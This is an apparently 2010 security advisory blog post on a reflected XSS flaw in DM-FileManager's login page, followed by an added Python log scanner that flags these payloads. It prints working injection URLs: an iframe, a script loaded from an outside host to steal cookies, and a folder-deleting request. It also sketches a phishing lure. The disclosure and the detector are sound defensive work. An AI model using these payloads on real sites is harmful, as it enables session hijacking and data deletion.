30 Jan 2010

DM-FileManager 3.9.9 XSS Vulnerability



The nDarkness community has recently been working with the wonderful developers over at DutchMonkey.com to review and point out security flaws in some of their freely available software.

During this review process, there were several issues found and we will be posting them in the coming weeks for educational purposes. It is our hope that this information will be used to help others write more secure code and realize the dangers involved with these mistakes.

DM-FileManager 3.9.9 and below are vulnerable to reflected XSS: the message parameter passed to login.php is echoed into the page without being sanitized.

This example embeds nDarkness.com in an iframe within the login page:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<p align=center><iframe src=http://ndarkness.com width=100% height=800></iframe></p>

Here is a URL-encoded version:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=%3C%70%20%61%6C%69%67%6E%3D%63%65%6E%74%65%72%3E%3C%69%66%72%61%6D%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%20%77%69%64%74%68%3D%31%30%30%25%20%68%65%69%67%68%74%3D%38%30%30%3E%3C%2F%69%66%72%61%6D%65%3E%3C%2F%70%3E

One step further is a cookie-stealing script:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=<SCRIPT SRC=http://blog.ndarkness.com/get-cookie.js></SCRIPT>

Here is a URL-encoded version:

http://localhost/~safety/dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%62%6C%6F%67%2E%6E%64%61%72%6B%6E%65%73%73%2E%63%6F%6D%2F%67%65%74%2D%63%6F%6F%6B%69%65%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E

A common way to exploit this would be to file a bogus bug report alerting the site owner to a problem, in the hope that they are logged in when they click the link above. The stolen cookie would then be used to hijack the user's session.

Another option is to point the message at the delete-folder command in ajax.php, so that the logged-in user's own browser deletes directories from their site:

http://localhost/~safety/dm-filemanager/login.php?referrer=/&message=http://localhost/~safety/dm-filemanager/ajax.php?currdir=/safety/Sites/wp/&rmdir=yes&folder=/safety/Sites/wp/wp-admin&dir=wp-admin

DM-FileManager users should not follow untrusted links and should upgrade to the latest version.
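As an added example, not part of the original advisory: a small Python scanner that a site owner could run over web-server access logs to flag requests to login.php whose message parameter decodes to HTML markup or to an absolute URL, the two shapes the attempts above take. The log lines, client addresses and the example.invalid host are constructed for illustration; the login.php path, the message parameter and the ajax.php delete-folder pattern come from the advisory.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request field of an Apache/Nginx combined-format log line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')
# Things a status message should never contain: a tag opener, an event handler or a javascript: URL.
MARKUP_RE = re.compile(r"</?[a-z!]|javascript\s*:|\bon[a-z]+\s*=", re.IGNORECASE)
# An absolute URL in `message` (the ajax.php trick above) is not a legitimate status message either.
URL_RE = re.compile(r"^\s*https?://", re.IGNORECASE)

# Constructed sample lines (not real traffic); example.invalid stands in for an attacker-controlled host.
SAMPLE_LOG = [
    '10.0.0.5 - - [30/Jan/2010:22:03:01 -0500] "GET /dm-filemanager/login.php?referrer=/&message=Session+expired HTTP/1.1" 200 2311',
    '10.0.0.9 - - [30/Jan/2010:22:03:07 -0500] "GET /dm-filemanager/login.php?referrer=/&message=%3Cp%20align%3Dcenter%3E%3Ciframe%20src%3Dhttp%3A%2F%2Fexample.invalid%3E%3C%2Fiframe%3E%3C%2Fp%3E HTTP/1.1" 200 2890',
    '10.0.0.9 - - [30/Jan/2010:22:03:15 -0500] "GET /dm-filemanager/login.php?message=%3C%53%43%52%49%50%54%20%53%52%43%3Dhttp%3A%2F%2Fexample.invalid%2Fx.js%3E%3C%2FSCRIPT%3E HTTP/1.1" 200 2402',
    '10.0.0.9 - - [30/Jan/2010:22:03:20 -0500] "GET /dm-filemanager/login.php?message=%253Ciframe%2520src%253Dhttp%253A%252F%252Fexample.invalid%253E HTTP/1.1" 200 2402',
    '10.0.0.9 - - [30/Jan/2010:22:03:31 -0500] "GET /dm-filemanager/login.php?referrer=/&message=http://localhost/dm-filemanager/ajax.php?currdir=/&rmdir=yes&folder=/wp-admin HTTP/1.1" 200 2402',
    '10.0.0.7 - - [30/Jan/2010:22:04:00 -0500] "GET /dm-filemanager/index.php?message=%3Cb%3Ehi%3C%2Fb%3E HTTP/1.1" 200 1200',
]

def fully_decode(value, rounds=3):
    """Percent-decode until stable so double-encoded payloads (%253C -> %3C -> <) are caught."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def classify_message(target):
    """Return ('markup'|'url', decoded_message) for a suspicious login.php request, else None."""
    parts = urlsplit(target)
    if not parts.path.endswith("/login.php"):
        return None  # the advisory concerns login.php; widen this check to cover other scripts
    for raw in parse_qs(parts.query, keep_blank_values=True).get("message", []):
        decoded = fully_decode(raw)  # parse_qs has already decoded one layer
        if MARKUP_RE.search(decoded):
            return ("markup", decoded)
        if URL_RE.match(decoded):
            return ("url", decoded)
    return None

def scan_log(lines):
    """Return [(line_no, client_ip, reason, decoded_message)] for each flagged request."""
    hits = []
    for no, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m and (verdict := classify_message(m.group("target"))):
            hits.append((no, line.split(" ", 1)[0]) + verdict)
    return hits
```

Running `scan_log(SAMPLE_LOG)` flags lines 2 to 5 (both encoded payloads, the double-encoded iframe, and the ajax.php URL) and leaves the benign message and the request to a different script alone.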


Tags: DM-FileManager, Exploit, Hacking, Software, Vulnerability, XSS

This entry was posted on Saturday, January 30th, 2010 at 10:03 pm and is filed under Computer Security. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
